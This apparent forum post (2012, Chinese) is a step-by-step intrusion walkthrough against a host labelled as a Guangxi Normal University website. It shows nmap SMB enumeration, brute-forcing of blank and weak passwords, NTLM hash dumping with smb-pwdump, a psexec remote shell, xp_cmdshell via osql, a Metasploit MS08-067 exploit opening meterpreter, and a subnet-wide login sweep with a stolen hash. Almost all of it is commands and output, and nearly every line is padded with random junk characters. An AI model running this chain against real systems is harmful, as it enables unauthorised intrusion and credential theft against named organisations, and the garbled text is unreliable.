广西师范网站http://202.103.242.241/
% Q6 m. O8 `1 {5 G9 j* @ O8 r Q
- W2 N y% x4 J- ~. b0 [6 wroot@bt:~# nmap -sS -sV 202.103.242.2414 A& t, U3 F! d
2 Z: t. j& D/ s3 \9 G1 aStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST$ I" L2 C3 x4 w" @7 L1 f" S
/ ?! v b$ m" t( S. v2 o! [
Nmap scan report for bogon (202.103.242.241)$ K2 u! {* T: W4 s; P5 |4 O: A
' J/ d" N% D8 u3 ]
Host is up (0.00048s latency).
2 X: b7 P' V- A
' w+ s$ w9 M' J7 D* H- f( TNot shown: 993 closed ports
$ e1 p5 k. N7 ^* Z8 u3 |) _$ d& p% c' L' g+ g" M
PORT STATE SERVICE VERSION
1 t! U- k( @: v/ b) d8 W6 L5 i4 M$ I" b4 a/ i: N; n
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)5 D4 C6 Y+ V6 `# k$ N/ K+ b+ l# I
* k) S' p: L" i) u8 C [. w139/tcp open netbios-ssn: e/ A- x/ p' N. C" z9 w: t
: p) ~, x! K2 x" w
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds$ f2 R( L6 D; v; U% Z3 G6 p
* \4 R2 G* l" k4 s! A9 o1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) B5 U* N* n! ], W5 P( O9 L
. Z/ @ D# f1 y0 I; b# E7 _# Y
1026/tcp open msrpc Microsoft Windows RPC
7 f8 S4 u2 w9 \3 I5 C4 q
/ j# B, g' Y+ D- w# |3372/tcp open msdtc?
$ j4 D* n0 n% G* y8 z4 l5 u
2 `+ Q1 b3 U7 L3 I1 B( u+ o$ t3389/tcp open ms-term-serv?
& z- }$ j' S2 y3 h8 M1 [1 X) _' A& B5 r% o" G; H
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
0 W0 D4 j3 `6 C, B o) ESF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
. \8 X7 |, l2 B% b! {
5 \3 D" o& t) K* H* aSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions/ ?% }5 ~+ s" g& a/ m
8 A# V& ?+ G! Q5 d# g Z) Y% R
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)4 n4 S0 L) _6 F! j, h
9 F7 f; _7 j& r4 D9 r- Q
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO2 T3 b$ A0 q0 H/ D" c" A) n" v
. f) r2 P, I+ P1 w, C5 K) ?SF:ptions,6,”hO\n\x000Z”);: \2 u7 i* ~; \5 ?- G3 t. O% t
1 ?8 J" B9 J$ i" p' Q
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
, ?5 ~: K; D' @; L Z. ~3 j6 F/ f* X9 S1 p) t. [ S" d' F6 ^
Service Info: OS: Windows$ v1 f# ]5 d9 b
2 K v+ }* N2 k& D9 U# \
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
& ]4 B! y3 v) _4 a
% g! t7 _. e' s4 q' zNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
4 I t# o# [0 {+ g/ d4 `7 D. V, x" J3 ^8 C
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
) S7 [+ ?6 p, b
3 G1 l' |" U7 O-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse4 s3 I6 e& v0 X
5 w. P4 L+ S8 t6 k, N* p
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
5 U7 C! j# |4 C0 C$ f
/ W: Q; _3 R; J/ d( ]2 f-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
6 ]% H# @6 o; D
9 n# R# b& A; x! A-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse; M5 J6 R, a2 M/ Q
( _" @; D; U2 B9 T
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse# w ]: V, a8 m: G% l3 @
" n$ S0 u! A) t; j6 {% h
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse s' p' S, ]/ V4 F
8 {6 K+ n& i7 _, Z" K7 ?
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse! q9 q5 \0 ?$ }5 W
r( t9 H% Y+ A; G9 c
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
- j- y1 o6 W) o( W s
2 b6 X! Q7 W0 g. J! Y0 M. r-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse9 Q) A, f8 A8 R4 C( K, ^
( P/ P3 G' N, i. S- y-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
9 g# }0 L6 _, @% a4 j$ I0 I+ K5 `0 B: u+ u6 ^8 L
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
1 `8 o Q3 s i9 \0 l# }3 s/ ~. G1 |7 W9 c. E- d
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse: T( l1 N+ d9 _
6 ]/ Z8 F, A/ ~! U-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse" e0 P) E- |9 b( b0 l9 a# C
1 J4 t5 \# j/ u) ~4 G0 c
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse7 [& J0 Y) e9 w U$ c4 ~% ~0 m; c
5 ~4 M2 V1 J( ^/ h/ ^. L-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
0 `1 x' ]5 O7 T; g' l. j* A1 A7 L, @1 R; N c% @8 h6 W
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 ( m9 y9 G* T0 |; Z, v, w
7 `1 v# v' T, _# L7 W6 l q
//此乃使用脚本扫描远程机器所存在的账户名# i% {% @/ D& w8 U, F3 d
. ^* E) Q$ ]" Q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
6 D i/ E' }/ }& L, k# O
5 K( V0 s% z7 ~6 QNmap scan report for bogon (202.103.242.241)
+ U$ h" M! y3 j1 d, }% a4 U% ?2 P2 i
Host is up (0.00038s latency).
# n# B1 G$ T! B2 N7 |7 R4 P. T0 Y, f+ R
Not shown: 993 closed ports( r; U! T- n5 y" d8 G# [. T
2 P8 g% V. w8 c
PORT STATE SERVICE' N7 W9 X# t& A2 y3 s+ [
4 Y- ]) T1 m5 F( t0 p135/tcp open msrpc
0 c' G# M5 l# C
+ \7 s9 M3 o/ C7 x139/tcp open netbios-ssn" |# v+ F5 O8 ?& F3 E I! f
' z5 @% m5 n: `; L
445/tcp open microsoft-ds
: ]7 {, _# C. e9 T2 Q
: U9 N2 v4 n9 _. Q, H( ^/ V, f1025/tcp open NFS-or-IIS
! T2 H: I; X( a3 J* w1 e, ?( p0 w
1 D3 j) Y* A% V, Y' f, v: n1026/tcp open LSA-or-nterm
2 D+ f. ^% G, `6 b& Q \$ Y& ?9 K2 l3 I( x" Z! u/ Y2 P: _
3372/tcp open msdtc
; R8 c9 ^# E) K5 E3 M* l L9 Q. n# w% i
3389/tcp open ms-term-serv
2 ]- F4 E! [4 M& I' y. j" J
" k' ~# Y" s" Z$ P7 h) KMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% f: Q; p5 b3 W, r
J! F* e; C0 }
Host script results:
$ N, |7 Z' R8 F) B0 X% j7 G) w! U: ?6 S: q
| smb-enum-users:( l) e! k2 v! C7 m
+ o5 v4 N4 v8 X2 _3 S/ z: c
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果3 S- T& Y# E6 f2 ]
* r( [0 n9 a+ e q% A
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
- D4 D; \' t% ~" c, m4 V2 w1 O( O1 b& E; z4 ]! G5 Y
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
7 `- X; h% R% o" X% K+ I* c' o. \4 E. _1 i5 d7 t. A
//查看共享$ v' ]6 m' f& t$ L
. N( P- _9 ^# z4 O8 n+ w8 P BStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
1 K1 o* U7 C' C
! n4 g2 A1 c$ ~Nmap scan report for bogon (202.103.242.241)
! b6 W+ e2 T! t7 A. T. h9 C- a4 }. t' x. P
Host is up (0.00035s latency).7 O. z2 D. g( |# m: t' c% b$ ^
" `5 ]5 c* G1 K- _2 ]& j6 CNot shown: 993 closed ports
( E5 g/ [; U0 \
/ k- b# d: {$ X9 G6 xPORT STATE SERVICE/ ]6 G4 r$ q; B( ?0 a0 E! D
4 c# Z3 w& T3 f4 D8 |" m: z
135/tcp open msrpc
$ |) P7 n8 O( b% A+ _, }5 V( x v5 Y
139/tcp open netbios-ssn
& _3 K4 x8 j. F( @2 C( }6 l
5 ^- o8 \4 ?0 P445/tcp open microsoft-ds
* _( L6 d# b3 [* {( l3 I3 k1 k, F
% x3 V9 \, Y" \4 C5 p1025/tcp open NFS-or-IIS! g, V. f' f3 ?! _4 g* l- a+ a- H* X
: @9 ^+ q8 |) g+ b3 p: j+ g: v1026/tcp open LSA-or-nterm
, H+ B, a' h; ?1 a. l+ `0 S6 N! U a P4 {8 `: z7 \
3372/tcp open msdtc1 q" D$ w9 P$ i" G! T8 Q
1 Z9 P( Q/ C6 t% Q g) p! `3389/tcp open ms-term-serv
_1 v j8 X3 [* a! {) A3 d9 f$ N+ h: [, x) N6 e+ ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
9 ^5 P/ W6 ]8 ]# j: {3 B
2 A ?& r7 q6 @6 uHost script results:+ f$ J& j n7 i5 A0 q: f$ B3 |0 k
; j) K: O) Q& g# ^' Z. x| smb-enum-shares:+ o4 H: r$ m1 J5 M! p: |8 _
% V- a- I) m ~, e| ADMIN$# f7 k5 d2 y/ P
' w# X+ J- J2 g| Anonymous access: <none>" m N2 g( \; G8 X5 k+ l
+ ?% G ~% j4 q# z1 h+ b e| C$6 A) N6 u+ f4 F" y
* K* s% Y: q5 u5 v0 s. h- T$ _5 v9 H/ {| Anonymous access: <none>, y2 @7 ?2 C' Y; D
: Y9 i( j5 v$ ?" {$ ~9 Q( E! x" J
| IPC$' u% O- F9 _) o( a8 E* [7 n
7 t, K+ A1 q& w4 ^# H|_ Anonymous access: READ5 e/ ]7 t" h9 x# z7 R4 ^
; u7 q; ~- ], T Y1 q& x3 g( Q+ aNmap done: 1 IP address (1 host up) scanned in 1.05 seconds. F/ w# O1 G3 H7 }
" N; H2 T& y7 g( U3 o' [2 E8 c0 a* jroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 9 y$ m' K, Y4 a8 c3 j
& p+ [8 T/ ^! y/ z
//获取用户密码- d- X- M/ k1 p @" s
' e# J$ H/ Z L Y- Z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
+ C$ T$ \1 b6 n9 D
+ y+ M/ F0 B! \8 z+ ^Nmap scan report for bogon (202.103.242.2418)2 q t- e% h% X: U9 ^- {# D
; g8 b& s* p. V5 h8 \8 L( `+ yHost is up (0.00041s latency).
: A6 W* y4 q5 s" w, s. J N& ]" q1 t- @$ K
Not shown: 993 closed ports
8 G* N4 u; r2 g( r7 H
, M2 z1 h" b3 B; D( p* zPORT STATE SERVICE
$ j- {& s5 F" H4 `( y/ P0 [) Z; ` ]. K9 a% ~& ~
135/tcp open msrpc; h9 e v2 G5 E3 t$ Z# b; C# m
* C3 V0 ^" z7 |4 S" X$ O139/tcp open netbios-ssn& v7 |7 r# \, X7 s" }0 b! |
* H6 X' z( k) R: [& L ~
445/tcp open microsoft-ds
: z9 R1 C. x2 g7 s: G6 O/ r
/ e; o) s. R; s6 K. K5 M. f& K1025/tcp open NFS-or-IIS6 H. m% x. s! Y' t# C
7 Y1 |4 d9 q+ j: G- e7 p1026/tcp open LSA-or-nterm
% {% d! q' |: M: ] L1 _. o2 I
, y& t5 r9 `( z3372/tcp open msdtc
" ~/ l2 Y7 e. D1 p8 n
2 t) O% j$ N+ l% j$ N1 J3389/tcp open ms-term-serv) S; ?9 Z/ A! t" Q# k8 ]$ i
7 U2 A t A( w- U; u) Q% F: t
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 M* y) a$ d8 G* [5 S
( t! ?' a1 V/ d/ M
Host script results:# a( @+ j! B0 F5 a! d+ A
4 y4 b* I/ F; E7 F
| smb-brute:
3 C& ?1 S. t; `$ P3 b" A
( ?8 C4 _0 W) H9 O# e' o. {administrator:<blank> => Login was successful
3 c" O8 t1 g6 Y4 F
" w' q z. l. j- [4 I1 ]& P6 ]|_ test:123456 => Login was successful
: `+ q) Q6 I% `! }% r$ j5 K8 Z" X% ~) _" g! I
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds6 i5 q9 b) u1 I$ J! }
$ |4 P7 G8 Z$ t
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash- {$ w) l/ I1 ]+ S9 d6 F
2 b/ D6 |4 Y( l1 ]+ M+ o4 Mroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data; ]) }$ r& Q, m& t6 i) R
: c8 J$ ?, p2 F' ~0 X% [; f0 t Q8 }/ N
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse. ]# ]- r5 G9 y+ G
; H1 s$ ^- r; h$ ^. z
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
4 {9 T& H" D) l9 c; P" f; g" Q% P E' S
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST* c- d1 V6 c* i& j5 A
/ {1 z* S2 q. b8 M5 M2 ?
Nmap scan report for bogon (202.103.242.241)( B4 d! x: o4 D3 k) y
9 S, U* H' V+ G; ^
Host is up (0.0012s latency).
# w# D d ]5 ?* E5 |6 |5 X% S" C& g! K- d3 S+ G' E K; ?! L
PORT STATE SERVICE# E( W6 l" c1 ~+ V- L( x! s) P
) \6 u4 d% t. O/ @$ |) Y, e" h# M135/tcp open msrpc# V9 B: m% Q4 |4 C3 Q" H
8 ^5 u* s% c+ Z2 S
139/tcp open netbios-ssn
* o* a7 B! @7 F; [
/ D* \0 y7 A8 b! \$ N" n6 P445/tcp open microsoft-ds
$ V/ F- G% @- Y+ {6 P# Q0 h
" T) m* t k/ u9 @7 vMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): E4 ?# m" k) [ }! ~
! S! D2 {- E0 v
Host script results:
$ ~ o$ e9 W- l: m" g+ z3 M
j( L$ u% U5 T| smb-pwdump:9 |5 d) h/ K# M, K$ m, ^$ J
* s4 c4 l4 y# l7 || Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************$ A* t# \) R+ }) ]
' h" O6 Y; [) z6 k! {( f6 h| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
3 v- B" Z3 h1 v! u- m
$ W+ t, \$ c" X3 V; H* f# T K| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4, Z& D$ M. Q5 n2 C
: ~2 w0 d( }! ^' L8 n+ p+ g
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2 f O% }+ W I; A6 W
" g" C& z1 @! ]( {
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
( }. U# Z+ G8 U; H3 x8 b6 H9 c
, ?7 S) K& J5 {1 I$ QC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell' P1 P: I& \, K: ?: T; G: U( ]& u0 g
2 r" o7 {: W- S" M- P% k
-p 123456 -e cmd.exe9 ?( p" a$ _0 b2 c W; V5 |
0 V8 j! p1 N, X7 U1 XPsExec v1.55 – Execute processes remotely
! K9 d5 [+ P1 o3 T, h$ X9 r+ i! W* `
Copyright (C) 2001-2004 Mark Russinovich
9 c {5 N; G# ^$ y n4 [7 O7 Q% q" b( c& T, [: c
Sysinternals – www.sysinternals.com
" b( A, a% q7 _5 x" h: o/ E }: M1 U1 C
Microsoft Windows 2000 [Version 5.00.2195]
- S, ]& i% E% ?2 x" S
, ?5 @- f# N7 q3 A(C) 版权所有 1985-2000 Microsoft Corp.) ^$ I* g0 P% n) K% e, ]- {& ?
" ]- e; l9 ~" p F9 ZC:\WINNT\system32>ipconfig
9 k' |$ t3 B! h F
' v$ `# O5 O$ I. f) n' Z* {8 uWindows 2000 IP Configuration
3 c# [% ]# y$ P' p4 x: M1 d# r: P# u. B( P
Ethernet adapter 本地连接:
( o/ A k6 o& D- ^$ |9 K3 c- }4 C, K! y6 d8 H) s4 W" V8 H# |* @
Connection-specific DNS Suffix . :
) O0 b( P- a) E5 L4 U8 b/ ?% x. J) W3 I. A: N
IP Address. . . . . . . . . . . . : 202.103.242.241
" w9 [* h4 g! i' O5 l! a1 Q. L
5 d. O% i( h$ U6 DSubnet Mask . . . . . . . . . . . : 255.255.255.0: H( k& G* Y* H# v/ p- h$ I6 j1 x
% X' ]" o+ A3 {! G( q& F3 n. r MDefault Gateway . . . . . . . . . : 202.103.1.1+ Z% u* O8 z. m7 s7 W8 J
3 z ~1 J9 [! I6 L( ~" V
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
4 m, e* A n' l9 P( r
' p: `) q5 }% z( r0 uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
2 { O# P3 E- q7 ~5 w6 l% k4 V' W+ p6 I
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST" C) O$ n$ s+ \7 s
9 N& }; C5 c7 @) t2 s9 w( `Nmap scan report for bogon (202.103.242.241)4 l, P% Z B1 T" n& ^; x7 u& \
B$ l" R+ n8 Z7 t j. _1 c1 _6 \Host is up (0.00046s latency).
. w, t/ C s7 k( h9 E( a
$ r+ S5 O# S, ~; K4 h( ?Not shown: 993 closed ports
) j& K: M3 E5 J) o1 [
# A: y8 [5 `; \3 B+ t9 APORT STATE SERVICE
- c( c: {+ M3 S+ u
( p5 }. U1 n" i) ?' m135/tcp open msrpc
B* f8 y* D( X3 V, J7 s% p
9 q; T" P. Y2 {' V139/tcp open netbios-ssn- P u' n0 a$ y1 s/ j% ~' Z
, c p0 |) z2 U, |3 C
445/tcp open microsoft-ds/ @& q, Q+ v0 s
! n4 I2 G/ k% @& C4 p' r0 ]
1025/tcp open NFS-or-IIS
2 {- b% f' `! t& P1 q7 c; p( [, A8 v1 N/ W; d
1026/tcp open LSA-or-nterm1 h7 _) Q3 P+ h$ {8 [ p
$ u, A K0 r# `. u e2 Y7 {3 p3372/tcp open msdtc1 T: A# J1 |1 S: o3 D- {2 a! v
- m, K4 s* @" O9 F+ g* w- |4 u$ x% s
3389/tcp open ms-term-serv
# D, t/ x. T- b& q4 x- f
# }5 o9 u7 Z3 `5 d8 y* D! jMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
5 h! u* Q1 }& J5 ?5 t- h5 s
* A2 ~0 }! @( @/ YHost script results:% X% b% g. L2 K7 \* ]
/ B& y' T0 ]; y| smb-check-vulns:. n( M3 {1 O4 b U( y
" I8 S7 m7 ~' N& o" {' v; r|_ MS08-067: VULNERABLE
+ w, t. |; E \
/ ~6 s6 C2 W Z* X8 K" G6 aNmap done: 1 IP address (1 host up) scanned in 1.43 seconds) n/ g, a4 T) H
5 B- S% j' f! V& k! P6 |6 oroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
: Y% u5 I/ @' T6 R* \" ^4 B0 D& d, M* A K6 _4 ^( U2 w% o
msf > search ms08* L4 v! U! q/ b0 e8 P
|: k+ g4 T( h% |3 V
msf > use exploit/windows/smb/ms08_067_netapi# D5 F- K/ m$ u X5 o
8 Z/ ]: I" D/ @9 l- P; ~8 ^
msf exploit(ms08_067_netapi) > show options) q4 | Y3 o# L% q; P( Z
' ?! ` u& N! A2 pmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
' h3 e7 l9 f: ^" [8 l4 l
- |& {+ u# O1 G6 k! ]# G6 dmsf exploit(ms08_067_netapi) > show payloads
& F' Y- k! W2 s$ M; Y
& K8 z/ [; {5 P9 b' J: Ymsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
; c0 M0 O% x Q8 z6 Y+ q$ S1 F6 @ L9 w7 o1 e$ S* g
msf exploit(ms08_067_netapi) > exploit
; J# l5 J( Z0 ?: ^1 k% ^' B; M2 c( _( X: Q
3 M/ ?1 h9 I2 y! j* Fmeterpreter >
1 _; x) h- N. V0 i5 X
* Y+ b, B0 b& m+ GBackground session 2? [y/N] (ctrl+z)
: m6 F" t, F9 x9 a' b5 g, }& o- c3 i3 A
msf exploit(ms08_067_netapi) > sessions -l
9 m& b3 Z3 b/ w, ~0 @1 d$ z2 S5 f3 `0 \. R) P) C3 B* z
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt; I% y1 O8 a+ U* x6 k
& h. B. F; ]8 }: X2 d; S
test: ^) Q* C: \- E# E* e# I/ d
9 Z3 T$ ]1 z! `7 r; g
administrator
! f p0 }1 T ?# x5 y' D
' G. k8 `+ G p$ r3 _9 t. Aroot@bt:/usr/local/share/nmap/scripts# vim password.txt# P/ E1 b* F! e2 `5 a
0 d! R' F% A% H/ S+ H, A44EFCE164AB921CAAAD3B435B51404EE
& c* g- `, y- U" D$ y1 S* Y& Z
) g, E% L) H% f% V& x6 [7 Droot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
0 |. w* Z& J0 r4 j4 Y. N! V! {3 B6 J* U1 \6 y- E
//利用用户名跟获取的hash尝试对整段内网进行登录0 G2 E9 X% o5 v# A: S+ N. l7 O. p
( _0 E1 f' {$ ^0 Z! W& YNmap scan report for 192.168.1.105
. O) ~# | X+ j2 Z; S# D0 f" d# N: ?1 _7 ]4 `7 v
Host is up (0.00088s latency).( ]7 {: p, P. k C: k
5 F5 H: d% T# [: s
Not shown: 993 closed ports
2 G$ v: \6 q% _! W! i0 D4 t3 g( y* ^
PORT STATE SERVICE
8 E9 M. B4 R# ?& Y6 X4 s x5 t% D0 h+ T0 i0 J; V
135/tcp open msrpc
4 J0 g5 ~9 r8 r7 m+ d
( Q% `, f, Z+ }& p1 C8 u2 K) B139/tcp open netbios-ssn% i5 d& r+ h6 R* s! F
+ j/ w4 S3 g# C; l) V& [, D445/tcp open microsoft-ds# _& E u9 a3 D1 \7 @# f3 s6 a& s2 }* A
( {# g- g6 ]: t* i* G1025/tcp open NFS-or-IIS- X) C/ O' G8 r# e! P% I$ y
/ A* c. v3 X, U# Z* Y& W+ p7 u
1026/tcp open LSA-or-nterm
( z, v' V* ~/ d9 P D2 e2 W& p: S% A8 M" C0 a( c
3372/tcp open msdtc% ]' T6 z" F" \; N" E
: v8 A8 d& a4 V$ |6 C2 Q8 y/ `5 i: y
3389/tcp open ms-term-serv* j+ |$ v+ |% L1 Q7 U% \
3 o) M' @! J% E, s& e, r' M# }# ]MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, U* f+ c4 V9 {! u; k1 q0 L1 e. z7 n1 H6 W
Host script results:
& Z' U, _2 }0 d Y& O D M
4 c& z2 s% H j7 p0 || smb-brute:4 P2 ^, t4 q* g5 U
3 A% P) e9 G) w) C# D; M|_ administrator:<blank> => Login was successful, x* F, P% O+ V% S% z: Q
1 C9 d2 E, x% X K3 s# I7 T" p攻击成功,一个简单的msf+nmap攻击~~·
# i0 p* @$ i9 n( @( C5 x0 G8 J% J g, g: D7 f$ X: ?$ K
|
发表于 2012-12-4 12:46:42
收藏
支持
反对